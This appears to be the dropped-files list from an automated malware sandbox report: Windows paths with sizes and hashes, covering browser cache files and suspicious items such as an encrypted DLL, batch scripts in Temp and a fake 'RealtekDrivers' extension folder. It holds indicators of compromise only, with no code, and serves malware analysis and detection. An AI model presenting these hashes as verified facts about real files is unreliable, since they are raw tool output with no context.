e4529b6d4e989b6e2b5508cd7cd2ad1e

SHA1
7935061e87893f74e555b2555643e9cb4f3f5ace

SHA256
10889faa85c9c37125abe2bb19be2a41cb9d80d91dc920841173e1fab56ec984

SHA512
b02236981012f2ed4aa8727221db8017373751d2fc33e424cea6a30ff1a0c08ee3967aa557cc8f3796f313bfaa2d77ca51839a213ff240cf9aba8dcd8c2bc919

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
6de10fdc5c8f50ba82deb0b7ac797fc7

SHA1
5ffbd83b04390adb6f1367dee9dcc28814f18dc3

SHA256
0806edcef26ae66058461da18177ad0ad889478bab25ea3e6d4fd03e2a973e14

SHA512
4cca34e27237409102072c1019cd255c1a1c3c10c959ae6466bfd6cd811ea08e69fe3b21870bf228042d6b51fd6bea599bd00ed9f9aa62ab9fa68ea7547e6575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
345b426d9102e92cb5d41d81eca8ff50

SHA1
780b306544315ba58a9b3bad6a5688d352969d91

SHA256
dfd2052ea91bafdee74b80dfc33737fef0b4c384fcae64e18bdc901d80bc1c64

SHA512
0a8e509ac86d7e4a683bd08ae0c8b403210616dbb68268cf62bf41faf344803f082b51a4a1736d8e096191457464ca0a288f84e3571b036c3732d1d1f8906976

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
db0dc81336458a3dce2e6118bb70dd0a

SHA1
2d58254a490a28e9fb099987d3b4113ad8cda08e

SHA256
9bc1596c035f09a7a4286ecb3efbc72a3768fdc849940921bc753f6980e289f7

SHA512
4a6904ccab2998f7cc9d0ec273193827f4b74dd51e172832a61d01e0b0a8db0798ff835e3e3e88e856bbd9827ad8f69b5300516f99f4877196a75921fc499a84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
a0ad7a77949130470213a51bc2b0fdf1

SHA1
1dfcacbc907a05eb6d3f60f2247c09df6c47deb5

SHA256
a8700a800cdc50f02cb6d45897ec143c3570e0f6e1446052935936aa47b6c092

SHA512
19ee4e8673b2279e5f9bc17d2aa3850b2344fde6995985d863ae3299c2a328d13ce0843fa20a7bd7b2fd74a8a40d46c387c51223ce1fb249327bcabc93ed55fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
111086c404cc0ae083488fea6e58adec

SHA1
de6687c263efc4438f5c0fb1eef19d4402becb85

SHA256
11741574f833dadaa632e6ca078bf2146c32b20ff52a385f5643ae53d0a69f85

SHA512
ea56e1d93f753302fa546b7e0e8a72ec70ce3b89c9eccc6521c1b010c63948b8e21ae63c719bc73bcda76c620dc3c668232150ba01db3b9558af4ab565bd43ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
1KB

MD5
f250ac28b64f9e90f497532fe02a88d3

SHA1
473128052ec6679bdc6f838b4f7befc0fbc45ff1

SHA256
0bd49b542acecc45b72539d7fb4f0360796b45a926f4ca1f744f722d4448344a

SHA512
f9667fb22e7a0f65c21f135fc692d32fd4b777f1788450d34c0012255b190db82c93215009f1abe59b35671cdd8e67a78b8f89023199a9ecfb12598dbef75da0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
2KB

MD5
142789de575cadacc50c2f281ac92ec7

SHA1
9716014329836468cc04462188cbcd88e0316319

SHA256
10ccf14d11e42a140fa0a0141b9b3f540f29952c534a42af758671b846507343

SHA512
cc5fdacc21109bff1146a8ae432cea326c4b7869c99113b106533718290406324ec80507ab4b6fac2eb5e401e1d047d1529f24f0fa8dd6f1ac422ba61afb2f9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\01fc15a1-b6f9-476e-8f56-8af5c9a01b29.dmp

Filesize
388KB

MD5
f1a49cfe0335d05cac9c08cfdf94143e

SHA1
aa3a668914a58b56bc706475d0c3e3e4c7cd23b0

SHA256
8c61278048892ab6adcccd5d5af80cd40b1b6d924fe3f2e04ba5fde78c912499

SHA512
8a3a3569da35999a760a26935202620e1701a8fedb8de53e9a0bb82a27d8ca0b7bb0897a87a460b0178c5b3b9a7eac4ecba0249d6f281deb7c036ae22ab20876

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\17350301-6fc1-4399-be6d-d8a931bec94b.dmp

Filesize
880KB

MD5
fe23aff9d0290ff57f95ba43e236c391

SHA1
67ee14f8479f810bc2d2d1f46b3d0d5bdc13f168

SHA256
ab47221dc792b71d882d6e6410e2926fe7dc5613afe7af748f8c7b1a0af22d22

SHA512
f0f8d27f862f4e4d3f05aa1a4b9efaf0cfa28ad2a04b1212781f16cbca6aacecca0ea31568003cedb2736bb2b8127ff3cd53ecb53371d8a7e5ed5929ea0bcedc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\38b016e6-2393-4ceb-9138-8d35b43012cc.dmp

Filesize
876KB

MD5
a20a6f410698f6c3031fa9d06cb520d4

SHA1
30487aa0e25deb9d8fea7b7e79b47935192a6ef5

SHA256
dc4a7b73282d33e81afb96d7e4d97e61a2e17522b6944191a7394b1a6762846d

SHA512
b6a105a827796c392c3c6550e71d7f3f9865978b58b4e4c2e7eaf4c2e0577f8ad446f201abcf55f36947237a804f63b38b4ee2bb23795d64b3fecd9e671899a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3b3fba85-6d65-4096-bd65-bf490878f338.dmp

Filesize
6.0MB

MD5
a35ae6112a0d2e09eb6634fa3ce886f0

SHA1
68b40c1060091aad9d841f3dc4c1e25ef760d8cd

SHA256
b915d59f191233c0af7acfe5cd6b2baecbbe98409f24c66e47c07b03b905c44b

SHA512
f4b02cf91b61b9884b2bead5225356ae17dcc504759130b7eeee6ab55574efa5850ae8b1864b818671ec01b079a9229db54e246a1703d72787364483b5abbb53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\44f78192-69e5-4e1b-a9b4-1b9c299f0a16.dmp

Filesize
6.1MB

MD5
ea6ed2dd2e7dda39def98cc94aa89fa5

SHA1
aefeb9367d934c7f9d45f1d8fc3dbcf9f705850c

SHA256
5a5d5808049648bb07aa9f712b9517ba02695d79b12fa16a797f08141a6f7e30

SHA512
bd251f86f0f525e7c4e250eb4ee6d28a8d34ca57216478795936f719c7a439b1bdd7f49e36baaf1f92fd892b278daa0568fa11c252fecb598111654be77ce7d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4713fd4c-2c80-4f57-93f7-d34784355265.dmp

Filesize
397KB

MD5
a28f38baddd23f36e6d39bb894a72897

SHA1
7ca19a0bc743c4a1584b2c5ff8fe1faf395f59e4

SHA256
15c90396037ec134323fdd3e9289bf61fd39bec2a432f2ae1a85163444ed8368

SHA512
2beb2809d1ffe49c73ea5df36510b5e7ee64c034ea10a710c0409a1f713d40a4df3de504db2e0890015e4b8aa1461891e65b48eb5c8766a5f86db3bec6a0db8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4723dbe9-76bc-48d4-a23a-eb5fc9528f45.dmp

Filesize
826KB

MD5
a4f8c411d89cc5c9024c270a750cd21c

SHA1
5718d032328e59cb199cc8831c5bdfbdea2f7254

SHA256
2f1c860a82ef90ff654522799ace73e2ac0d9554a66f3442c3ac2b13a0a66116

SHA512
061a6c82c9c75b2839994b01e400a1f61f35845f8ed1c47d14f82cea062918d1b6e58d4c2057ca89c9676fd5f14a3fb90551932917f8c543c5369a85c9b053ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4b60a5d0-80c7-4041-bc8e-661786c5fcd0.dmp

Filesize
838KB

MD5
dc42a323d2f28b6502d3dc5594106ab4

SHA1
652234ed1d45d63d9a2f7932b00e5a84eaa4c9cc

SHA256
ba477c4c636969ad88e6b8a9edca1cba236e180accde9ba120c54a07fcc42159

SHA512
ddcfc51aa61573dfc0b84fb71784ee146e4290411686ed339cc6f042efdcd441d24cacbdd2c467c80a50c917be143a91bac28f0ab4ddd09c6de2bca209a4cbd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ae393181-9f50-4700-9a7e-834cf3159eea.dmp

Filesize
880KB

MD5
6b10281b6e054e6995fc0f4306a669ea

SHA1
26166933c5e2bb1923294ebf66994bb648d1da3a

SHA256
c1729c819b52df71ab75f8805378c79a473fb873b5f21d05aea52a271146afff

SHA512
281c330c788a9342319fd2372083f094b35a2098e373f1b9af6e05cec31b5361978abaf2a5e0cb568faee5bea2eda064ab6f8855c3d6b490515ce0bbba1bf745

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\af6f9515-f7cc-4d55-849d-1d65d7bc924f.dmp

Filesize
826KB

MD5
55c4f3badf148e2492c8a8d480324da9

SHA1
f92eb5c9079d43e7ac60f33c3a097e5625907ffa

SHA256
6da19cac6855ecbd4478c3cae00675dcbd72c72ffb5417e9125b894cb52fe466

SHA512
deb3ac7a00158b93b73f635c873140780e0f92bbae50383403fa5e60b85a6253c7a0ae5fdbf3a3203191abd286f47d30e9a8461e3705cd5d7b800cc8500f3980

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b4f7b66e-6467-474a-a8ce-48a7eb550bb2.dmp

Filesize
830KB

MD5
1a05c9cdd2c0bd220258c5d37a89d2ba

SHA1
21f39db1df33db42ca2845145fb7134ad3725553

SHA256
d93e2d4a18f41d8091457c19771aa624aade01eb02ae2bedb31f4b4e49ecd07e

SHA512
3cf9e08364ddefee56294147e43718f68ed6463b5e19d9a304e707dc96cdaaec4f751f33123e8e379c8bb892a3fa62547d92e47853c76780c28fd6a8c0817c00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\be3c9eba-14a7-4d54-bf53-91b276f0a78c.dmp

Filesize
830KB

MD5
388a045e2bc95de8e3f7f446b19ecaac

SHA1
fdcd78a72db5253cb728b8b26a9cc41953457f71

SHA256
5fff58afdd815b0046f94594985609544f568f4d9ccaa3afdf2c830dd411a242

SHA512
78ebe5963e18c59f57511e980fef3fee03ed53e3e1d690086b382be50e168ac7c04da6a60d34fa266a6449354264a8e30dc5b883f5d80708452ef3e2b1d2938b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c25c5be4-fb30-4bd2-abb7-36e5c3879459.dmp

Filesize
872KB

MD5
12e8ae06ce5526b002686a22c9ade902

SHA1
3618c421ffd64e6d42f0b970b7c6beaa79d0bfbd

SHA256
e82a97d40a778a68bc6acf5de3a0b6a37176efadc977bcbe435f0afec1965662

SHA512
0997bbd6a82d11ffe6ce4e9cf37095b5c87515a2a1d9f59d6b17c155b7fbcaf0747c6be9e6e34401ff4255ac3824bbea035c4b14ed6cfb8273a55d5690a6ac31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c2dab4f9-39c4-48e6-bf6d-504dfad87e3a.dmp

Filesize
880KB

MD5
deaf08490e48ac40198c68c17355d46d

SHA1
e1996cffa5a81c33a6635f67e378efc22eea2d48

SHA256
edafcf7aab435e77743ac166880c1ffdad7dcf76893a55fce677ccf953e13333

SHA512
93b28deae7e3a97bbbd2a5d16e05fab0a8dc6ca346d22712bfdb463e233f1356aeb697094896046bbc9223a6e9bda0a4fa075374931cd7018cd26ac79345c49c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\cdb30a91-3575-4032-9cdd-cd8af2b4988f.dmp

Filesize
860KB

MD5
cbb1157a91d82053b8603ffc798894f2

SHA1
335ec1c047722e59369e68780cdc5b346cda1984

SHA256
ea07335079a1a2cf8368a7a42740ad3d03686e0a17354b30cd94f42feb2ad8a4

SHA512
e7f32a7c100b7d67cfcfae9ea8e97e1df4a6a92abb4cdd2b6778f93c6d60130d2827d8adc5a6110e0609572d1ac7d54e1efed17dd835ed0ee4752c464d9639b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\cf41f912-adfb-49d7-ae1f-69f1c1947cac.dmp

Filesize
830KB

MD5
86a494729c785b982995f24cd702f302

SHA1
841d69b031286b3696bcc51eb837748a691d15c3

SHA256
dcb4fcae8ccba175234191801d93d1274198ae301af6dad2aaa008a933178d13

SHA512
3589590e14ecdbe7fbabeb4f004fc8b15a36950527cda61c5509c3bee90c049669de10ad9f7f28aa2ae1bc6caa5fb21a998e4985b0555458b01516759e7309e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\dcb95540-d523-497b-9254-13c0ab0270f6.dmp

Filesize
830KB

MD5
67bdf3045aca7a1e7ea8a3b3cf0ec457

SHA1
9bfefd0dbe84d60c399ba32fa359b199e8a88e80

SHA256
0f2d315ca36f883f0b10ed779254dbf85edfdc4646b1275c801d6eaf668f4813

SHA512
1ec6c76e4d0d03fe54ccbef5d2d0293b060807fc8c9c3e1ed118c55e5017ef1dd61ba72919962274e00cfa5df6551e508e525ce950abe7f1db31bbddc1ebf41d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e2882b4e-8829-4c5c-8716-be265df17925.dmp

Filesize
838KB

MD5
3401550c87232974dab9880010ad1f54

SHA1
97b9b1362adfaf95ef43996cf3c4b0acf37dadf3

SHA256
bc5df252b372eead718424432842562c67ee7f192964ecc2edf077cbe7ef5e6e

SHA512
8ae466b68fe2946ce952eb957c2caf79b8ce30541a29cc963ab486bd9097320441115660f647a258bfaa498f34470908d992de241ba620449aa5af9d7c83e5c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f65c5ed9-d0b4-48ad-b999-8d408d06251d.dmp

Filesize
838KB

MD5
6af67d4d0c22cc0818e29c689efa58de

SHA1
191e300c0b4b3470487f097568d1e9cf90494cd0

SHA256
e9e7d3c6110a1ac76642946348ea5ac1e51bb1e4b5e5b7f915dc7b25389f2081

SHA512
ca62fa65bb12f39d834e1b77a039bcf1b9d824830d280d2baf8b317597635d23522fab74e4cb57a0a9b18d263e325d0ee652c8824de20cf68b90687cf0ab02b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6a51ea4f2663890395df72d3ae0a1e32

SHA1
f908703f793491ad10f98f7a5a6e0bd023245ef6

SHA256
ff996919fba219f45e9477f0c6b0fe24fcd1bb1a8a3901d5cf37f34e900563e7

SHA512
8a69e67a6f3d0918c38a47a61d310acc0df79094519bffc4096e66995953ff54d25e3395938c53e3ad6ebfacb19a5f62f7b24a2b824b1923eebe911e40a8ae4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fa277cb7b922e5178a42250dc799beaa

SHA1
e07abbd6301c7a1c2f4dd9765196cd0a236a0940

SHA256
a9aa8071981c5be381dc51b98a7f7c46a893a3ca821bf16e5c67db4030a82f5b

SHA512
71d2a54c4dd5f73c872b07ca7ff04d96f3a850d6bbf21f1d59e78feb341ef0a61b927e44bf0bebc949e632e9c265599d25444cc3033dc40620661934466846eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b80e2caaa8c5dfe7f63a692082fbc929

SHA1
4e1b06bb2c45b1610d3de759b067b90a3c64e4c7

SHA256
a73accdbc66cae9f4dc1007b758ca2d7558bcaee1f05f511043e2a97cda45da0

SHA512
65a298d67744b17a7234d0a81451f102d88feef8824b8d1a9204f4caff111f999fa41270961ec295bb372cd9c70b473ed999024d8ac1506ec7a61a22b2401d7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1816c49cde383b8ff67ecb7d07d2aabc

SHA1
61db4da16546085a9481e8b71f0f2fc1401487bd

SHA256
02826e0930e4252dae81d038f4b2ae8838e1511b91839e4a89ac265a9baf578c

SHA512
edd08e6f47e3cc45b9f3f958b50f70af307eb488457317c2f37cbd56a1b925d43e02ce7ae16133f82d5b8eb56dab31fc1bb3c5fd30ad11a1f7cde3760b13d546

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2635841122d4bbbe33a7165f341faca1

SHA1
f6bd0dcc740e9e1e74e496698d044c3938cfffa9

SHA256
24ce14f82d1e0ea2b4cecef9047ef21a20d34de8e2075e9d6a94925f421cc9fa

SHA512
8fcd2bf25e93cbf1904805147e47eb2b8e5f95a1efa0003c80ccc4fd6e5c436da7c53b6ed0cf5d4ae8f932a8a7a29890be9fba0e3aa5f8e3a62a2b76cf21fdc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9d07a48053ee0052c18601b0934ed20f

SHA1
3d6443426db8a0155a01de7976ed4bd9cfd324ea

SHA256
975241e30ab02fe4de3f0da143c550d34d7070ff694f2eca4b61234cac73f5a6

SHA512
2abc565d9eb5cf8e5ba4b5bc9f8d28ceeb8e1fc21c3a5ec5103a5a8ec14651a1875e6f19c8f854f1286e0634b454e8f7ea9c47dd94208ab9c0250c0efa4be664

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
581d69d8cffb7a6cf27d367bf9a6ae14

SHA1
5d84648f570bbc9dc18eec9223264a5e5495ac9b

SHA256
b9eb9e972eaacca2ec6ac6346ffe9be090831beeb1b120973cfa5401cc3cd612

SHA512
004d56b846dcaac6eb25fc5737cfe5c126a709641f7d3d37b3af309102d7b4ff38b531fb9902e6d3ed66407270a35f18272be741a6495a73145e353d930d4736

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f390459ec23e7fd14b857b886543a07c

SHA1
1ab1171f910777508e68bb0e7a4a77d060d58240

SHA256
0f5f38e72310a54748a169fcc455bec477b683b03d38e7ad4a3aff07e87a2298

SHA512
90769739a9aa8421810b6fca84298befd426d974e7b7839784c586a6137abae927ee874e5bebec0521903057e346229b4fb6cb48da7182d5887e6d11475d72b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b03fe2454086c63b3a2b5fa10319b9ff

SHA1
b294e51811e626340b4dcecedbd96b31ad635d1f

SHA256
023fe74baec3659f5b0b62ed78313929e4e3d928265c465251ad6a992bf7d0c6

SHA512
09c0640e40171b114d017e0946fcbfe96ad5eddbcfcacb9057691163eb3087a2abe50bd94e478ab5af643c0bdb4f2c72626e426d8d0bb60c9ba971514b39fb79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2c714c5755189e3379b2db2189b9b242

SHA1
5f3568283f1aa05acf4151ff08af0e4f36f241a6

SHA256
5a88f22a76135eecfee754861d617b92487c3ff17993b8ab7e1e87db22afa6d7

SHA512
9ba97c78c72d8a51398901c23b0b8627d9e784c838e6c9baf9c5af0667fa12243cb3ea8e068fbe67bb51c7aa8d9980febac0cf5e33803799b5bc9b6c8c3a2610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
142750ef36db3b68bbda49e29e4a70fd

SHA1
d87e9ac8d6b2a6368a3ac18d1449ac410652fc55

SHA256
c2474c81102d0fe3d7f799eaf25f4a670f3701ed746ff68a6309ece2ff5d595e

SHA512
3c658c63ac86b8b17981897968d444ed6ee3d21e4a4071ae5621858ace49cd8312c56713d085b50cde32a973938dcd08479d09ed702fe0a6468edc15050c7c2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
15748550041f0dcfaf8262ec4a922965

SHA1
b1dfc4d428771c69af65755d075df1d7b863002c

SHA256
744bc050e44ff286fa947030eb64a7ed5b755dcfec5ff55d6ba3fb74611218e6

SHA512
d7e8ead77ca42d33f82ce866a01f379e25210f537b7bef7dec03dc97db39594e0d0ef03b7818626b020a00364190feba81a8e7fd4eba5d23b8a40622d9f1a0ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2YUS9Q6F\dll[1]

Filesize
236KB

MD5
2ecb51ab00c5f340380ecf849291dbcf

SHA1
1a4dffbce2a4ce65495ed79eab42a4da3b660931

SHA256
f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

SHA512
e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\fuckingdllENCR[1].dll

Filesize
95KB

MD5
e6743949bbf24b39b25399cd7c5d3a2e

SHA1
dbe84c91a9b0accd2c1c16d49b48faeaec830239

SHA256
a3b82fc46635a467cc8375d40ddbddd71cae3b7659d2bb5c3c4370930ae9468c

SHA512
3d50396cdf33f5c6522d4c485d96425c0ddb341db9bd66c43eae6d8617b26a4d9b4b9a5aee0457a4f1ec6fac3cb8208c562a479dcae024a50143cbfa4e1f15f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\soft[1]

Filesize
1.4MB

MD5
a8cf5621811f7fac55cfe8cb3fa6b9f6

SHA1
121356839e8138a03141f5f5856936a85bd2a474

SHA256
614a0362ab87cee48d0935b5bb957d539be1d94c6fdeb3fe42fac4fbe182c10c

SHA512
4479d951435f222ca7306774002f030972c9f1715d6aaf512fca9420dd79cb6d08240f80129f213851773290254be34f0ff63c7b1f4d554a7db5f84b69e84bdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W9QJOIKH\key[1].htm

Filesize
21B

MD5
408e94319d97609b8e768415873d5a14

SHA1
e1f56de347505607893a0a1442b6f3659bef79c4

SHA256
e29a4fd2cb1f367a743ea7cfd356dbd19aeb271523bbae49d4f53257c3b0a78d

SHA512
994fa19673c6adc2cc5ef31c6a5c323406bb351551219ee0eeda4663ec32daf2a1d14702472b5cf7b476809b088c85c5be684916b73046da0df72236bc6f5608

Download Submit
C:\Users\Admin\AppData\Local\Temp\Appreciate.cmd

Filesize
15KB

MD5
cf4a755aa7bfb2afae9d7b0bae7a56cb

SHA1
f6fe9d88779c3277c86c52918fc050c585007d93

SHA256
2853c2f9d3db94ea67286c50a896f30c0eb4914763d8d74b450ac3faeea2c5d2

SHA512
bc185b1886fe438418b282df25d234b92f80386697bdd743d568849de572776439d0336263b3b9ffc4d6994e79316747e4483067ead4c5b8ec5ed09f6f592967

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fail.cmd

Filesize
22KB

MD5
4b3a0e1f46e0a61c8bfe9b6619a0d12b

SHA1
5014b84611b06c05f3cefd3f3e74713301a50ffe

SHA256
ecc8abc33adddba1a6fe1dc626698aba572b61fe8a6988ce541ddb7b16f2e7c7

SHA512
540a8c2b3561087afddb79cc4827c0232b8bfc4486dbd535708d76ad6804e2b8526cb28168d717749e1983329ad20567da19ad1283570cdd1e85d676368651c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
131B

MD5
7bf85bc0ec34294c3bafee80a5ee0d90

SHA1
f215b0396bf8040413c35f1a190ae78f4b5d7974

SHA256
bef86355bfb865f05bc5d7056c563fece8c81482b95cfce78acd02d2ff5b96ba

SHA512
0d96ad1a1c36e2638be28c656a316e7657203f3b5eb4b2e37ab3a8b28a92aee8578ca4b4e96dad3346d3cfc103110ab6ed8a4b149a7e38fecee9ed535553e3c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
144B

MD5
48c20b95bcf07ed589d0e1cf7b693ddc

SHA1
97f635a533b9a925faed8be44e530101aaece52e

SHA256
3a3141276a43c09548c5b9cc96541ec70ca315205e9d70f6fc34a4a509dcd4d9

SHA512
55da6a8ec8d38d9b9cce101dd2ba936cec196137398aff48fbc386a71a6cc43129c0474a09af0f41ac4b6dfa94cb495044518cfed5e174b8cb541b90ba7f4b11

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
205B

MD5
2d337dcbab745b1b49b51bf0bf21fd21

SHA1
75cb203975040d0ae9cba3e06e6f8194e91f52f4

SHA256
667315a4acc089aa2ca11b7427502699f2198503843cfbb90f2f81460222621a

SHA512
89a3ccd6189a78918d4c4e3b08d6453b4a24d3d7da365157c7f13a783a88dad8f1c7d06b5f63cb71768661953ab5e95486153a124684114dc31b75ac24452086

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log.tmp

Filesize
217B

MD5
c4372638db4618e3513f9d0ea424436e

SHA1
853119bd1ac55e5ce253369ce2e809edb80bf097

SHA256
f88cafe37ad032209dadc199ecea803d4bf31329dd3f0272f6f5bd884de33c49

SHA512
2ed2591aacc4cdb2911943697a5e469dd6594da2302b7e6af20be02990801a63a515e630cb804145a93eef4e00e1016e41af86135ea2af84b90582f6abdeb899

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\chrome\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp6C0E.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvt2cz1l.ush.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
